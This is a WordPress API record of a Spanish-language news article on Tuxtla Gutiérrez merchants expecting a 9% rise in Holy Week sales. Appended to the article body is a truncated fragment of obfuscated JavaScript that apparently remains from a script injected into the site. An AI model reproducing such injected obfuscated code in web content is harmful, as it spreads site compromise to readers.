{"id":21274,"date":"2025-04-05T01:21:05","date_gmt":"2025-04-05T01:21:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21274"},"modified":"2025-04-05T01:21:06","modified_gmt":"2025-04-05T01:21:06","slug":"empresas-formales-esperan-un-incremento-en-ventas-por-semana-santa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21274","title":{"rendered":"Empresas formales esperan un incremento en ventas por Semana Santa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"696\" height=\"464\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250404-WA0029.jpg\" alt=\"\" class=\"wp-image-21275\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250404-WA0029.jpg 696w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250404-WA0029-300x200.jpg 300w\" sizes=\"auto, (max-width: 696px) 100vw, 696px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>4 de abril del 2025. Tuxtla Guti\u00e9rrez.- Empresarios de la C\u00e1mara Nacional de Comercio, Servicios y Turismo de Tuxtla Guti\u00e9rrez (Canaco Servytur Tuxtla) dio esperan un incremento del 9% en las ventas de sus comercios afiliados durante la temporada comercial de Semana Santa, en comparaci\u00f3n con el mismo periodo del a\u00f1o anterior.<\/p>\n\n\n\n<p>Miguel \u00c1ngel Blas Guti\u00e9rrez presidente del organismo empresarial destac\u00f3 que este crecimiento responde a la mayor afluencia tur\u00edstica en el estado, as\u00ed como a las estrategias implementadas por los comercios para atraer clientes con promociones y productos especializados para la temporada.<\/p>\n\n\n\n<p>Subray\u00f3 que con la reciente instalaci\u00f3n de la Federaci\u00f3n de C\u00e1maras Nacionales de Comercio en Chiapas, se fortalecer\u00e1 la promoci\u00f3n y difusi\u00f3n de los comercios afiliados a trav\u00e9s de los canales oficiales de la CANACO.<\/p>\n\n\n\n<p>&#8220;Es fundamental que los comerciantes se acerquen a nosotros para aprovechar los beneficios que ofrecemos en materia de promoci\u00f3n y posicionamiento. A trav\u00e9s de nuestras plataformas, podemos impulsar el consumo local y fortalecer la econom\u00eda de nuestra regi\u00f3n&#8221;, dijo Blas Guti\u00e9rrez.<br>Adem\u00e1s, hizo un llamado a la ciudadan\u00eda a priorizar el consumo en negocios locales, pues esto genera un impacto positivo en la econom\u00eda de Chiapas, fomenta la generaci\u00f3n de empleos y fortalece la competitividad del sector.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 4 de abril del 2025. Tuxtla Guti\u00e9rrez.- Empresarios de la C\u00e1mara Nacional de Comercio, Servicios y Turismo de Tuxtla Guti\u00e9rrez (Canaco Servytur Tuxtla) dio esperan un incremento del 9% en las ventas de sus comercios afiliados durante la temporada comercial de Semana Santa, en comparaci\u00f3n con el mismo periodo del a\u00f1o anterior. Miguel &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21275,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21274","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21274"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21274\/revisions"}],"predecessor-version":[{"id":21276,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21274\/revisions\/21276"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21275"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}